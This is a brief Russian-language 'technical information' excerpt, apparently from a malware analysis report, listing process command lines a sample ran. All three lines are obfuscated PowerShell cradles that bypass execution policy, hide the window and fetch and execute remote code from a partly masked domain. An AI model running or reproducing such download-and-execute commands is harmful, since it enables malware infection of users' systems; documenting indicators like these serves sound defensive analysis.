Техническая информация
- '<SYSTEM32>\cmd.exe' /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://la####ecipes.com/mages.jp' + 'g' ))
- '<SYSTEM32>\cmd.exe' /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://la####ecipes.com/mages.jp' + 'g' ))' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ex BYPAsS -NoP -w 1 iEx( curL ('http://la####ecipes.com/mages.jp' + 'g' ))